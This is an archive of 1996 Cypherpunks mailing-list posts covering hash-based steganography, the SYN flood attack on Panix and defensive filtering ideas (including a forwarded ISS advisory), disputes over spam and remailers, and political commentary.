that combine into a very incriminating encrypted message and then leaking  
the key.


> The cyphertext/plaintext ratio looks like getting
> really huge too.  Your messages must all arrive, and
> retain the right order.   

> 


Hey, I never claimed it was efficient.  :-)

Actually, the messages don't have to arrive in order.  The correct order  
can be discovered by trial and error (e.g.  does this combination decrypt  
into something readable?  No. How about this one?).

Depending on the cryptographic protocol, there may be other, more  
efficient means for sending hidden encrypted messages.  If, for example, a  
protocol requires a cryptographically random confounder to be appended to  
the front of the plaintext before encryption, you could use chunks of you  
secret encrypted message for the entire confounder.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 14 Sep 1996 01:18:53 +0800
To: cypherpunks@toad.com
Subject: 260_0it
Message-ID: <199609131302.NAA16956@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-13-96. WaJo: 
 
   "Magazine's Recipes For Hackers' Havoc: Warning or Weapon?" 
 
      Whoever attacked Panix could have found guide in latest 
      issue of 2600. 2600's editor defends the article as a 
      way to point out holes in computer security that need to 
      be fixed. He says similar attacks have occurred before, 
      and that he's not even sure the hacker who attacked 
      Panix used 2600 as a guide, since an on-line publication 
      recently published similar directions. 
 
   "Internet Censorship in China, Singapore May Affect 
   Law-Abiding Citizens Most" 
 
      For the underground dissident or hardcore pornography 
      enthusiast, the latest moves in Asia to censor the 
      Internet pose little challenge. The greatest effect will 
      be on normal, law-abiding citizens, experts say. 
 
   FiTi: "Intelligent machines will take control of our lives" 
 
      Before long, every vehicle will be fitted with a GPS 
      receiver, making its position known to local area 
      traffic management systems. In the home, a financial and 
      stock control system would automatically order food and 
      groceries when necessary. Intelligent machines might 
      "decide" that it would be more efficient not to order 
      any more food - and shut you out of the house. 
 
      "It's more or less inevitable. Business and science will 
      drive this to the utmost." 
 
   ----- 
 
   http://jya.com/2600it.txt  (10 kb for 3) 
 
   260_0it 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 08:11:53 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <ae5f0a3c0d021004fdbe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:06 PM 9/13/96, Asgaard wrote:
>From a
>pure egotistical viewpoint I really should join the present calls
>for, as the debate goes here in Sweden, transforming the enemployed
>into 'maids and servants'. But I don't. I think it would backlash;
>the 'lower classes' would come back at us and cut our throats
>eventually (say, when 70% are serving the remaining 30%).

The 70% already _are_ cutting the throats of the other 30%. It's called a
60%+ tax rate. This is the sum of: federal income tax, state income tax,
city tax, sales tax, gas tax, energy tax, property tax, entertainment tax,
special excise taxes on alcohol, cigarettes, etc., and miscellaneous other
taxes tacked on...not to mention the "double taxation" of certain forms of
income--every dollar Intel earns is taxed first at 48% by the Feds and the
State of California, then what's left is taxed at 35-40% when it reaches
the owners of the company. (Oh, and buyers of PCs containing Intel chips
pay 8.25% for the privilege of buying the PC.)

The masses have realized, as De Tocqueville predicted 150 years ago, that
they can use the democratic process to pick the pockets of others. This is
why I have no faith in "democracy," and consider crypto anarchy to be the
best way to undermine this flawed system.

>With the present rate of increase in world population the planet
>will go to hell anyway. But suppose the population problem could
>be fixed. Then, with technology escalating towards singularity,

Cf. what sociologists call "the demographic transition." Countries that
value learning and wealth are _not_ facing a population problem. In fact,
many such countries are now at "below replacement" birth levels.

>machines doing almost all labor, there could certainly exist a
>system where the 'dumb' and 'lazy' could be fed and housed properly
>without anybody complaining. Those who want to become maids and
>servants for some extra pocket money, well, good luck to them.

One need not wait for this fanciful "singularity"--by any reasonable
standards of providing minimal food and minimal shelter, the unemployed
poor of today are receiving this. Ask a peasant of, say, 18th century
Europe if he'd consider himself sheltered and fed if he could have an
apartment in a building, a microwave oven, a television, a MacDonald's
nearby, and enough extra spending money for some beer.

I predict that "the masses fed by the nanotechnological singularity" will
be just as likely to riot and burn down their own neighborhoods as the
"masses fed by industrialization and distribution" are prone to do today.
(The point being that people want more than "basic food and shelter," but
are often unwilling to make the commitments and sacrifices in their lives
to gain the wherewithal to earn significant salaries.)

>But to force people into menial service jobs just to literally
>survive is not to my taste. No, give them minimal shelter for
>nothing and from there on let the market anarcho-capitalistic
>struggle begin, for obtaining a higher than minimum material
>standard or reputational standing.

There is a basic error here, one that I see often. Who says that the
"anarcho-capitalists" will freely give away, say, some vast fraction of
their profits so as to subsidize the overall society? Any more so than the
owners of flour mills and computer chip companies give away 99% of their
profits.

And crypto anarchy means it will not be clear who is making what, who is
generating what income, and where it is located. And the producers of
wealth will be able to move accounts, resources, and even factories around
the world. If one jurisdiction socks them with exorbitant taxes (which may
be anything more than a nearly ignorable 10% overall tax), they can move.
Regulatory arbitrage strikes again.

Ask your fellow Swedes about the drain of talent out of Sweden in the 60s
and 70s...the flight of Bergmann, actors and actresses, corporations, and
even ABBA. (Though I understand most of ABBA moved back to Sweden and is
now chummy with the Queen.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 08:03:51 +0800
To: cypherpunks@toad.com
Subject: Re: "Remailers can't afford to be choosy"
Message-ID: <ae5f0ff90e02100456f8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 PM 9/13/96, E. Allen Smith wrote:
>From:   IN%"tcmay@got.net" 13-SEP-1996 04:33:21.66
>
>>By the way, today's remailers appear to be primarily _experiments_ or
>>_casual services_, not altruistic services for some nebulous idea of "free
>>speech." (Besides, if it's illegal for "spammers" to use remailers, so much
>>for "free speech.")
>
>        Umm.... freedom of the press is freedom for he who owns the press.
>The remailer operators own the presses; why shouldn't they use whatever means
>they see fit to determine how they can be used? I encourage people not to
>discriminate on the basis of the political orientation of what's going
>through... but spam isn't political speech. (I agree that the government
>should not be in the business of determining what is spam and what is
>political speech - all speech should be protected - but remailer operators
>are not governments.)

There are many nuanced definitions of "free speech." I was replying to
someone who used in connection with his belief that remailers primarily
exist as a service to enable "free speech." Hence my comment.

I'm fully aware of the rights of remailers to limit what they pass on. I
just don't think it wise, nor do I think it fits with pious calls for "free
speech."

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sat, 14 Sep 1996 08:22:54 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Unrequested mail from Mr. Babayco
In-Reply-To: <ae5ed8fd080210046bbc@[207.167.93.63]>
Message-ID: <Pine.3.89.9609131318.A14127-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, Timothy C. May wrote:

> At 4:28 AM 9/13/96, Z.B. wrote:
> 
[snip]
> 
> 
> Mr. Babayco,
> 
> I did not request your mail to me, and I am annoyed at having received it.
> 
> I am not interested in the views you are advertising or selling, and I'd
> prefer that you not mail me.
> 
> To make me whole, I demand that you send me $125 for this occurrence, and
> $125 for each future occurrence.
> 
> Have a nice day.
> 
> --Timothy C. May

Very well then, Mr. May.  I did not request YOUR mail EITHER, so I demand 
that you send ME $250 for receipt of this message, and $250 for each 
additional message I receive from you.  I also demand that you send me 
$10,000 for taking up my valuable time with this message, and $5,000 for 
network access fees.

Have a nice day!

Even if you are serious about this, the fact that you signed up to a 
mailing list entitles you to all of the messages that go over this list, 
plus people's replies to your posts.  The point of my original message 
was that mail from a non-commercial individual, such as yourself or other 
people on this list is welcomed, but mail from people trying to sell me 
something is not.  Perhaps I should have made that more clear in my 
original post.


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 14 Sep 1996 07:54:09 +0800
To: cypherpunks@toad.com
Subject: Internet Drivers' Licenses
In-Reply-To: <199609131832.OAA17532@attrh1.attrh.att.com>
Message-ID: <199609132026.NAA15888@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:

> Anybody for an Internet Driver's License?

At this point, I would love the ability to filter news and mail 
according to some criteria related to the sender's probable
reputation.  Back in the early days of C&S, spam was an 
intellectual issue.  Now it is a good chunk of the entire
bandwidth of major components of the Net.

I am now getting more junk email than email from people I 
care to correspond with.  It seems one can't even read the
scholarly newsgroups anymore without "Come Watch Us Lick
Ourselves on the Web" messages popping up regularly.

It's really getting to the point where the time-honored
suggestion of "just hit your delete key" cannot deal with the
obverwhelming amount of Drek posted, much of it with subject
lines deliberately designed to blend in with the newsgroup
topic.

Just being able to filter out posts from Net addresses that
don't correspond to real identifiable humans posting under
their legal names would be a good first step.  

Purely voluntary, of course, since any filtering would be
done at the reading end, and people could still post anything
they liked.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M C Wong <mcw@hpato.aus.hp.com>
Date: Fri, 13 Sep 1996 16:16:02 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: PANIX.COM down: denial of service attack
In-Reply-To: <2.2.32.19960912182630.008b6324@panix.com>
Message-ID: <199609130334.AA161125684@relay.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



> Here are the gory details from the first MOTD last Saturday:

>                The attacker is forging random source addresses on his
>                packets, so there is no way to find his/her location. There
>                is also no way to screen out those packets with a simple
>                router filter.

>                This is probably the most deadly type of denial-of-service
>                attack possible. There is no easy or quick way of dealing
>                with it. If it continues into Saturday we will start working
>                on kernel modifications to try to absorb the damage
>                (since there's absolutely no way to avoid it). This
>                however will not be an easy job and it could take days to
>                get done (and get done right).

>                For those who are IP hackers, the problem is that we're
>                being flooded with SYNs from random IP addresses on
>                our smtp ports. We are getting on average 150 packets
                     ^^^^

                 Can't access to this port be guarded against by a filtering
		 router which is configured to accept *only* a number of
		 trusted MX hosts ? That is the target itself *never* permits
		 any incoming traffic to smtp port *not* in the list of trusted
		 MX hosts, which does buffering for the target ?
		 Info on such MX hosts be hidden from secured way of DNS
		 setup so attacker will not learn about the MX hosts easily.
		 In case on MX host get flooded, there will be at least one
		 backup host to take over to prevent a total D.O.S.


> Since then the packet streams have hit almost all the ports for news, www,
> telnet, etc.  

> DCF

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 M.C Wong                                  Email: mcw@hpato.aus.hp.com 
 Australian Telecom Operation              Voice: +61 3 9210 5568
 Hewlett-Packard Australia Ltd             Fax:   +61 3 9210 5550
 P.O. Box 221, Blackburn 3130, Australia




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Admin <admin@superhot.com>
Date: Sat, 14 Sep 1996 07:47:33 +0800
To: "Richard Johnson" <rjj@medialab.com>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609131941.NAA15578@rintintin.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 PM 9/13/96 -0600, you wrote:
>At 19:02 9/12/96, Ross Wright wrote to cypherpunks@toad.com and
>remailer-operators@c2.org and...:
>>On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote:
>>> However, since others may think like you, I guess I'll have to add a line
>>> above my link stating that email not related to the purpose of my site
>>> will be happily proof-read at the rate of $200 per hour,
>>
>>Just great.  That sure takes away any anonymity you had about being
>>"on the cutting edge" of the information age.  That 1952 "proof-read"
>>crap went out in the 70's.  How can you hope to enforce it?  It's a
>>joke, right? :)  Maybe not, since it's on your sig-line.
>
>
>Hey, that was my too-long sig, Ross.  There is obviously more than one
>person who disagrees with your assertion that listing an email address
>somewhere is an open invitation for mail to that address on any topic or
>for any purpose.
>
>Also, I charge $500 per message.  I've always liked flat fees. :-)
>
>------- Forwarded Message -------
>At 21:50 9/11/96, Ross Wright <rwright@adnetsol.com> wrote to
>cypherpunks@toad.com and remailer-operators@c2.org:
>>As I said having a website invites comments.  It's like being a
>>public figure.  In effect you are publishing your e-mail address.
>
>
>Interesting perspective.  However, placing an email address on a web page
>is by no means an offer to take "comments" (i.e., marketing spams) on
>anything that strikes the spammer's fancy.

How would you know what the *intent* of these other people is in placing
mailme: tags on their public pages unless you have been to the specific
pages. You speak only for yourself, yet you try to imply that you speak for
everyone on the www who has placed a mailto: tag on their pages.



>
>The context in which any email address is mentioned will tell you what
>sorts of messages are expected at that address.  


Would it make a difference if the message to the webmasters mailto: buttons
said "Nice webpages you have, when you get a moment check out my designs".
Remember the thread is about an Artist who sent out only his URL to
encourage visitors. This is and was a NON commercial site.


>To maintain otherwise is
>just a flimsy excuse for "seedy low life multi-level-marketing jerks" who
>want to cover their postage-due unsolicited advertising/promotional email
>in some false cloak of respectability.

*Respectability* is subjective to the definer...

>
>To continue the comment box analogy, the stuffing of salsa sample comment
>boxes (next to the salsa sample booth in the grocery store) with ads for
>anything you're pushing is most decidedly not what the comment box is for.


Without a disclaimer on the box stating specifically what cannot be placed
in it there can be no knowing what the boxholder finds of personal interest...



>--
>"As the most participatory form of mass speech yet developed, the Internet
>deserves the highest protection from governmental intrusion. ... Just as the
>strength of the Internet is chaos, so the strength of our liberty depends
>upon the chaos and cacophony of the unfettered speech the First Amendment
>protects."
>        -- Judge Stewart Dalzell
>
>Unsolicited advertising/promotional email proofread for $500/message!  Your
>sending such a message to me is an explicit request for my services!


Inane, off-thread, unsupported weak analogous attempts at reasoned argument
received, but not read - simply deleted, for $1000/message. Sending OR
posting the above to me or a Newsgroup that I may happen to read constitutes
your accord and acceptance of the above contract. If I must read them, the
fee is $2000/message.

admin
<>________________Lowest_Priced_Long_Distance__________________<>
||Long Distance 9.9¢/min           |Helping hardworking people ||
||9.9¢ Anytime, Anywhere in US!    |like yourself pay the      ||
||Free sign-up, 6 second billing   |lowest possible price for  ||
||http://www.superhot.com/phone    |high quality LD service.   ||
<>-----------------------1_303_692_5190------------------------<>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 07:58:06 +0800
To: cypherpunks@toad.com
Subject: Re: Unrequested mail from Mr. Babayco
Message-ID: <ae5f16690f021004da27@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:24 PM 9/13/96, Z.B. wrote:

>Even if you are serious about this, the fact that you signed up to a
>mailing list entitles you to all of the messages that go over this list,
>plus people's replies to your posts.  The point of my original message
>was that mail from a non-commercial individual, such as yourself or other
>people on this list is welcomed, but mail from people trying to sell me
>something is not.  Perhaps I should have made that more clear in my
>original post.

And by having a public mailbox, you are in no position to say some entities
cannot mail to you.

While unwanted e-mail is bothersome, so are unwanted telephone calls,
unwanted faxes, unwanted regular mail, unwanted conversations at parties,
unwanted attention in general, and "unwanted unwanteds" in their most
general form.

But unless such unwanted things become frequent beyond some threshold (as
repeated phone calls may be, or as "fax-bombing" can be, or as "stalking"
situations occur, depending on various laws), the the law does not offer
convenient solutions. Nor should we want the already overcrowded courts and
jails clogged with "He sent me a message I didn't want!" whines.

The solution is screening calls with an answering machine or using
something like Caller ID to screen incoming calls, having an unlisted
number, turning off a fax machine except when expecting a fax, using Eudora
or procmail to filter messages. In other words, the equivalents of fences,
locks, doors, gates, and other barriers.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Sat, 14 Sep 1996 01:56:56 +0800
To: cypherpunks@toad.com
Subject: really (?) undetectable crypto
Message-ID: <9609131255.AA26331@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain





 >  Jim_Miller@suite.com wrote on CP:
 >  
 >  Most everybody on the list is familiar with the technique of hiding  
 >  encrypted messages in the LSBs of image files.  Personally, I would not  
 >  use such a technique because don't I believe it's really undetectable.  I  
 >  assume, without proof, that the LSBs of images files have statistical  
 >  properties that are sufficiently different from encrypted data that a  
 >  clever person could determine whether or not an image file contained an  
 >  imbedded encrypted message.
 >  

Not to mention 7 out of 8 bits may reveal the image to be a library one
your enemy has access to.  The changes will betray the stego.
Your own scanned snapshots may be safer from this point of view.

 >  Fortunately, there are other steganographic techniques that, I believe,  
 >  are undetectable.  The trick is to hide your encrypted bits in other  
 >  encrypted bits.
 >  
 >  trick #1)   Let's say you want to send a short encrypted message via a  
 >  communications channel that only allows cleartext messages with optional  
 >  MD5 message hashes.  You can construct cleartext messages, via  
 >  trial-and-error, such that the first 4 or 8 bits (or more, if you have the  
 >  time) of the MD5 hash match the first 4 or 8 bits of your encrypted  
 >  message.
 >  
 >  Since the bits in an MD5 message hash are presumably cryptographically  
 >  random, there should be no way to tell if some of the bits combine to make  
 >  an encrypted message.

What about Walter making insignificant changes to the cleartext and
replacing the hash with the new hash?   Because you are using an unkeyed
hash (and not a sig) he can do that and foul up the stegomessage (not
that he'll yet be sure there is one).

 >  trick #2)  Let's say you are allowed to use 40 bit encryption, but nothing  
 >  stronger.  As in trick #1, you can pre-compute plaintext messages such  
 >  that the first 4 or 8 of the bits in the output of the government-approved  
 >  40 bit encrypted data match the first 4 or 8 bits of your hidden encrypted  
 >  message.
 >  

Walter can still play silly spooks with your stego if he breaks the 40-bit encryption.

The cyphertext/plaintext ratio looks like getting really huge too.  Your messages
must all arrive, and retain the right order.  


 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Fri, 13 Sep 1996 23:50:24 +0800
To: cypherpunks@toad.com
Subject: 56 kbps modems
Message-ID: <Pine.HPP.3.91.960913140446.12376A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


>U.S. Robotics and Rockwell International are planning new modems with
>speeds up to 56 kbps a second, almost double the speed of the fastest
>rate now available.  The new devices should be available by the end of
>the year, although their top speed initially may be less than 56 kbps.
>(Wall Street Journal 12 Sep 96 B11)

People who seemed to know used to say that 'the Shannon limit'
set an absolute upper limit around 40 kbps. Has Shannon been
proven wrong, or what?

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 14 Sep 1996 00:06:36 +0800
To: cypherpunks@toad.com
Subject: What is this nonsense? (Anti DVD piracy chip)
In-Reply-To: <960913.002423.7Q6.rnr.w165w@sendai.scytale.com>
Message-ID: <323950B0.167EB0E7@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Taken from a recent Edupage:

> SGS-THOMSON TAKES AIM AT DVD PIRACY
> SGS-Thomson Microelectronics has developed a computer chip that prevents
> would-be DVD pirates from making unlawful copies of movies from digital
> video disc players.  The chip scrambles the disk's coding if it's duplicated
> on a VCR.  (Investor's Business Daily 11 Sep 96 A6)

Anyone know anything about this?  Sounds like nonsense to me ...

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M C Wong <mcw@hpato.aus.hp.com>
Date: Fri, 13 Sep 1996 15:21:59 +0800
To: perry@piermont.com
Subject: Re: PANIX.COM down: denial of service attack
In-Reply-To: <199609130408.AAA09629@jekyll.piermont.com>
Message-ID: <199609130416.AA198858212@relay.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



> M C Wong writes:
> > >                For those who are IP hackers, the problem is that we're
> > >                being flooded with SYNs from random IP addresses on
> > >                our smtp ports. We are getting on average 150 packets
> >                      ^^^^
> > 
> >                  Can't access to this port be guarded against by a filtering
> > 		 router which is configured to accept *only* a number of
> > 		 trusted MX hosts ?

> Sure -- if you only want to accept mail from fifteen machines on
> earth. If on the other hand your users might get mail from anywhere on
> earth, your mail ports have to be open to connections from anywhere.

No, I am saying that we use MX field in DNS to specify our MX hosts, so
other hosts from anywhere else will timeout connecting to the target smtp
while trying to deliver mails directly to it, and hence will have to send 
the message to next best MX host instead, and the firewall is configured 
to permit access *only* from those MX hosts.

The problem here becomes how one can protect all those MX hosts instead.
DNS cannot hide those info properly I believe since it will mean it also
hides info of mail delivery to the host, a D.O.S in itself,. 8-((

> .pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mycroft <mycroft@datasphere.net>
Date: Sat, 14 Sep 1996 08:41:51 +0800
To: cypherpunks@toad.com
Subject: Forwarded message from Christopher Klaus (SYN Flooding [info])
Message-ID: <199609132117.OAA05315@chrome.DataSphere.NeT>
MIME-Version: 1.0
Content-Type: text/plain


------- start of forwarded message (RFC 934 encapsulation) -------
Content-Length: 3804
Return-Path: owner-bugtraq@NETSPACE.ORG
Received: from brimstone.netspace.org ([128.148.157.143]) by chrome.DataSphere.NeT (8.7.5/8.7.3) with ESMTP id NAA05258 for <mycroft@DATASPHERE.NET>; Fri, 13 Sep 1996 13:20:11 -0700 (PDT)
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <24730-24839>; Fri, 13 Sep 1996 14:27:52 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id OAA28644; Fri, 13 Sep 1996 14:27:19 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 397572 for BUGTRAQ@NETSPACE.ORG; Fri, 13 Sep 1996 14:23:31
          -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org
          (8.7/8.6.12) with SMTP id OAA27584 for <BUGTRAQ@NETSPACE.ORG>; Fri,
          13 Sep 1996 14:19:44 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by netspace.org
          (8.7/8.6.12) with SMTP id LAA05934 for <bugtraq@netspace.org>; Fri,
          13 Sep 1996 11:02:26 -0400
Received: (from cklaus@localhost) by phoenix.iss.net (8.6.13/8.6.12) id
          KAA06507 for bugtraq@netspace.org; Fri, 13 Sep 1996 10:58:24 -0400
X-Mailer: ELM [version 2.4 PL24 PGP2]
Content-Type: text
Approved-By:  Christopher Klaus <cklaus@ISS.NET>
Message-ID: <199609131458.KAA06507@phoenix.iss.net>
Reply-To: Christopher Klaus <cklaus@iss.net>
From: Christopher Klaus <cklaus@iss.net>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Subject:      SYN Flooding [info]
Date: 	Fri, 13 Sep 1996 10:58:24 -0400

[Below we have a software tool that will recognize SYN floods and correct
the problem.]

Possible solution to SYN Flooding attacks


The attack is on!  Both 2600 and Phrack, 2 of the biggest well-known
underground hacking magazines, have posted exploit code to do one of the
nastiest denial of service attacks that the Internet has seen so far.
Hundreds of people have access to these programs to bring down services on
the Internet.  Many of these people are targeting their attacks at various
organizations such as ISP.  Panix, an ISP, has been under attack for quite
a few days now and they have not been able to receive email. Many other
ISPs are suffering from the SYN flood attack.  This attack is being
discussed on many mailing lists, newsgroups, and Thursday's Wall Street
Journal (9/12/96).  Fortunately a solution already exists as we discuss
below.

Everyone connected to the Internet relies on TCP/IP.  When you establish a
connection with TCP, you do a 3-way handshake.  The connecting host sends
a SYN packet to the receiving host.  The receiving host sends a SYN|ACK
packet back and to fully establish a connection, the connecting host
finally responds with an ACK packet.

In a SYN flood attack, an attacker host sends many SYN packets and does
not respond with an ACK to the SYN|ACK's.  As the receiving host is
waiting for more and more ACK's, the buffer queue will fill up and the
receiving machine can no longer accepts legitimate connections. This means
that attackers can block your email, web, or any other service you are
providing on the Internet.

To even make this attack worse, the code exploiting the problem randomizes
the source address of the attacking host.  Thus, the receiving machine
gets packets that appear to be from all over the Internet, hiding the
location of the attacker.

Solution

There are several things we can do to stop these attacks from being
effective.

With the routers for most ISP, they should be blocking any non-internal
addresses from leaving their network and going to the Internet. This will
stop an attacker if their ISP implements this.  Unfortunately, this does
not stop an attack from areas on the Internet that do not block that. But
at least the ISP can feel comfortable to know that an attacker can not
launch his attack from that ISP.

Here are two methods of helping eliminate the problem.  Some of the
exploit code I have seen does not pick a random source port.  It would be
easy to block the attack with a router denying any packets coming from a
specific source port. This may not be too effective because of the trivial
nature of adding code to randomize the source port, sequence number,
source address, and TTL.  But it might help you temporarily if you notice
the attacks have any pattern that can be blocked by router rules.

Another way to fix this is to set the kernel maximum number of half open
connections allowed (SO_MAXCONN) to a higher number than the default value.
We have a tool that will look for SYN packets that do not get followed with
ACK and clean the half open connections by sending a RST packet.  This
unclogs the port and allows legitimate connections to happen.  This tool
is called RealSecure (tm).  To obtain a copy of the RealSecure tool,
send email to majordomo@Iss.net and within the body of the message, type:

        subscribe realsecure

RealSecure (tm) is a comprehensive attack recognition and real time response
tool that ISS is alpha testing and will expire in 60 days.

- --
Christopher William Klaus            Voice: (770)395-0150. Fax: (770)395-1972
Internet Security Systems, Inc.                        "Internet Scanner finds
Ste. 660,41 Perimeter Center East,Atlanta,GA 30346 your network security holes
Web: http://www.iss.net/  Email: cklaus@iss.net        before the hackers do."
------- end -------
-- 
[:]====================================================================[:]
[\] Mycroft <mycroft@datasphere.net>	   >>>>>[DataSphere]<<<<<      [=]
[=] Key fingerprint = DD B1 A7 D9 2D DF A0 F7  23 C2 6B EC 5A AD 01 A9 [\]
[:]====================================================================[:]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Sat, 14 Sep 1996 02:13:06 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <199609120716.IAA00231@server.test.net>
Message-ID: <m0v1XpV-0000C5C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back writes:

>Hadn't heard that before, that the trade secret requirement was
>imposed on RSADSI.

Schneier writes (2nd ed., p. 398): "This special export status has
nothing to do with the secrecy of the algorithm, although RSA Data
Security, Inc. has hinted for years that it does."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 14 Sep 1996 07:43:06 +0800
To: tcmay@got.net
Subject: Re: "Remailers can't afford to be choosy"
Message-ID: <01I9FNB4810G9ULP6J@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 13-SEP-1996 04:33:21.66

>By the way, today's remailers appear to be primarily _experiments_ or
>_casual services_, not altruistic services for some nebulous idea of "free
>speech." (Besides, if it's illegal for "spammers" to use remailers, so much
>for "free speech.")

	Umm.... freedom of the press is freedom for he who owns the press.
The remailer operators own the presses; why shouldn't they use whatever means
they see fit to determine how they can be used? I encourage people not to
discriminate on the basis of the political orientation of what's going
through... but spam isn't political speech. (I agree that the government
should not be in the business of determining what is spam and what is
political speech - all speech should be protected - but remailer operators
are not governments.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 14 Sep 1996 01:51:05 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: Observer's defense of "Internet Pornography" article
In-Reply-To: <v03007800ae5e5369499a@[17.202.12.102]>
Message-ID: <3239614D.2781E494@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Martin Minow wrote:
> 
> The only revelation is that Demon (the major Internet provider) plans
> to block access to some newsgroups/sites.

The only reason I ever used to use them was their lack of censorship. 
If they go ahead with this blocking, I doubt I'll ever use them again.
Of course it's the principle, not the fact that I have nothing better to
do all day long that download porn :-)

> Also, assuming I read between the lines correctly, Demon receives three
> billion (with a "b") e-mail messages per day. I can never remember whether
> British usage is "thousand million," or "million million", but the numbers
> seem a bit large in any case.

They'll mean 3,000,000,000 (Brits hardly ever use billion to mean
million million).

> Perhaps they mean "3 billion bytes of e-mail."

I doubt it.  A friend of mine, a demon subscriber, sends over a Gig of
email every day.

> (Assume ten million Demon subscribers and three thousand million e-mail
> messages. This implies that the average subscriber receives 300 e-mail
> messages per day. Are they all subscribing to Cypherpunks?)

I think there are in the order of 100,000 subscribers, so this would
make the average 30,000 email message - definately not realistic.
 
Gary
--
